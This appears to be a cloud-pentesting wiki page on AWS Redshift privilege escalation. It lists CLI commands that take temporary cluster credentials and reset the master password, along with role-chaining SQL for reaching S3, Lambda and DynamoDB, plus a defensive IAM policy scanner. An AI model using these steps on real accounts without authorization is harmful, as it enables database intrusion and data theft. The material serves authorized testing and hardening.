AWS - Redshift Privesc

Redshift

For more information about RDS, check:

AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

With these permissions you can get information about all the clusters (including the name and the cluster username) and get credentials to access them:

bash
# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Potential Impact: Access to sensitive information inside the databases.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

With these permissions you can get information about all the clusters and get credentials to access them.
Note that the postgres user will have the permissions that the IAM identity used to get the credentials has.

bash
# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Potential Impact: Access to sensitive information inside the databases.

redshift:DescribeClusters, redshift:ModifyCluster?

It's possible to modify the master password of the internal postgres (Redshift) user from the aws cli (I think these are the permissions you need but I haven't tested them yet):

aws redshift modify-cluster --cluster-identifier <identifier-for-the-cluster> --master-user-password 'master-password'

Potential Impact: Access to sensitive information inside the databases.
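A defender-side check for the three permission sets above, as an added example that is not part of the original page: it scans an IAM policy document for Allow statements whose Action (or NotAction) grants redshift:GetClusterCredentials, redshift:GetClusterCredentialsWithIAM or redshift:ModifyCluster. The sample policy, its account ID and the function names are constructed for illustration.

```python
import fnmatch

# Actions this page lists as privilege-escalation paths.
RISKY_ACTIONS = ("redshift:GetClusterCredentials",
                 "redshift:GetClusterCredentialsWithIAM",
                 "redshift:ModifyCluster")

def _as_list(value):
    """IAM accepts a single string or a list for Action/NotAction/Resource."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)

def _matches(action, patterns):
    """IAM action matching is case-insensitive and supports * and ? wildcards."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def risky_redshift_grants(policy):
    """Return (sid, action, wildcard_resource) for each risky action allowed."""
    stmts = policy.get("Statement", [])
    if isinstance(stmts, dict):          # a single statement may be a bare object
        stmts = [stmts]
    findings = []
    for n, stmt in enumerate(stmts):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", f"statement[{n}]")
        wildcard = any("*" in r for r in _as_list(stmt.get("Resource")))
        if "NotAction" in stmt:          # Allow + NotAction grants everything else
            excluded = _as_list(stmt["NotAction"])
            granted = [a for a in RISKY_ACTIONS if not _matches(a, excluded)]
        else:
            allowed = _as_list(stmt.get("Action"))
            granted = [a for a in RISKY_ACTIONS if _matches(a, allowed)]
        findings += [(sid, a, wildcard) for a in granted]
    return findings

# Constructed sample policy (not taken from any real account).
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "ReadOnly", "Effect": "Allow",
     "Action": ["redshift:Describe*"], "Resource": "*"},
    {"Sid": "TempCreds", "Effect": "Allow",
     "Action": "redshift:getclustercredentials*",
     "Resource": "arn:aws:redshift:us-east-1:111122223333:dbuser:redshift-cluster-1/analyst"},
    {"Sid": "DenyModify", "Effect": "Deny",
     "Action": "redshift:ModifyCluster", "Resource": "*"}]}

if __name__ == "__main__":
    for finding in risky_redshift_grants(SAMPLE_POLICY):
        print(finding)
```

The check reads one policy document in isolation; it does not evaluate explicit denies, conditions, permission boundaries or SCPs, so treat a finding as a statement to review rather than a confirmed effective permission.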

Accessing External Services

warning

To access all the following resources, you will need to specify the role to use. A Redshift cluster can have a list of AWS roles assigned that you can use if you know the ARN, or you can just set "default" to use the default one assigned.

Moreover, as explained here, Redshift also allows chaining roles (as long as the first one can assume the second one) to get further access, simply by separating them with a comma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

As explained in https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, it's possible to call a Lambda function from Redshift with something like:

sql
CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

As explained in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, it's possible to read and write in S3 buckets:

sql
-- Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

-- Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

As explained in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, it's possible to get data from DynamoDB:

sql
copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

warning

The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the REGION option to specify the AWS Region in which the Amazon DynamoDB table is located.

EMR

Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html
